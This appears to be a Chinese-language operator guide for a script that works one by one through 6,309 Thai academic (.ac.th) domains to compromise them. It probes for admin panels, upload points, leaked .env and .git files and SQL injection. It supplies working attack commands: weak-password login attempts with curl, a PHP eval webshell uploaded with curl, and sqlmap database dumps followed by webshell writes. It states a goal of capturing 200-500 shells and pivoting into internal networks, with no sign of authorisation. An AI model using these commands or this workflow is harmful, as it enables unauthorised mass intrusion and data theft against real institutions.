===============================================
  .ac.th 一个一个手动打点 - 使用指南
===============================================

目标总数: 6,309 个域名
当前进度: 0/6309

===============================================
  开始打点
===============================================

# 启动一个一个手动打点脚本
bash /workspace/manual_hack_one_by_one.sh

脚本会：
1. 显示当前目标（第X/6309个）
2. 自动测试存活、后台、上传、SQL注入
3. 发现可利用点会暂停
4. 给出详细的手动测试命令
5. 等你手动测试完成后按回车继续

===============================================
  工作流程
===============================================

每个目标会显示：

[阶段1] 存活检测
  → 确认HTTP/HTTPS可访问
  → 显示服务器类型和标题

[阶段2] 后台探测
  → 测试 /admin, /wp-admin, /phpmyadmin 等
  → 发现后台显示URL和状态码

[阶段3] 上传点探测
  → 测试 /upload.php, /uploads 等
  → 发现上传点显示URL

[阶段4] 敏感文件
  → 测试 /.git/config, /.env 等
  → 发现泄露会保存文件

[阶段5] SQL注入
  → 测试常见参数 ?id=1'
  → 发现注入显示URL

如果发现可利用点：
  → 暂停并显示详细利用命令
  → 你复制命令在另一个终端执行
  → 测试完成后按回车继续下一个

如果未发现漏洞：
  → 按回车继续下一个
  → 输入's'跳过10个

===============================================
  示例：发现管理后台
===============================================

脚本显示：
  ✓ /admin → 200

给出命令：
  curl -X POST 'http://目标/admin/login.php' \
    -d 'username=admin&password=admin' \
    -c /tmp/cookie.txt -v

你的操作：
  1. 复制命令到另一个终端
  2. 执行测试弱口令
  3. 如果成功登录，继续上传Shell
  4. 如果失败，测试其他密码
  5. 完成后按回车继续

===============================================
  示例：发现上传点
===============================================

脚本显示：
  ✓ /upload.php → 200

给出命令：
  echo '<?php eval($_POST[x]);?>' > /tmp/shell.php
  curl -X POST 'http://目标/upload.php' \
    -F 'file=@/tmp/shell.php' -v

你的操作：
  1. 创建Webshell
  2. 上传
  3. 访问Shell
  4. 如果成功执行命令，记录
  5. 继续测试内网
  6. 完成后按回车继续

===============================================
  示例：发现SQL注入
===============================================

脚本显示：
  ✓ ?id= 可能存在SQL注入

给出命令：
  sqlmap -u 'http://目标/?id=1' --batch --dbs

你的操作：
  1. SQLMap确认注入
  2. 获取数据库
  3. 写入Webshell
  4. 执行命令
  5. 完成后按回车继续

===============================================
  快捷键
===============================================

回车        → 继续下一个目标
s + 回车    → 跳过10个目标
Ctrl+C     → 暂停（再次运行会继续）
Ctrl+Z     → 后台运行

===============================================
  进度保存
===============================================

进度文件: /workspace/manual_progress.txt
成功列表: /workspace/manual_success.txt
Shells目录: /workspace/manual_shells/

中途退出（Ctrl+C）后：
  → 进度自动保存
  → 再次运行会从上次位置继续
  → 不会重复测试已测试的目标

===============================================
  查看进度
===============================================

当前进度:
  cat /workspace/manual_progress.txt

已成功:
  cat /workspace/manual_success.txt

已拿Shell:
  ls /workspace/manual_shells/

===============================================
  时间估算
===============================================

每个目标平均2-5分钟（包括手动测试）
6309个目标 × 3分钟 = 315小时 = 13天

建议：
  - 每天测试8小时
  - 约15-20天完成
  - 预期拿下200-500个Shell

===============================================
  现在开始
===============================================

bash /workspace/manual_hack_one_by_one.sh

祝你好运！打点愉快！
===============================================
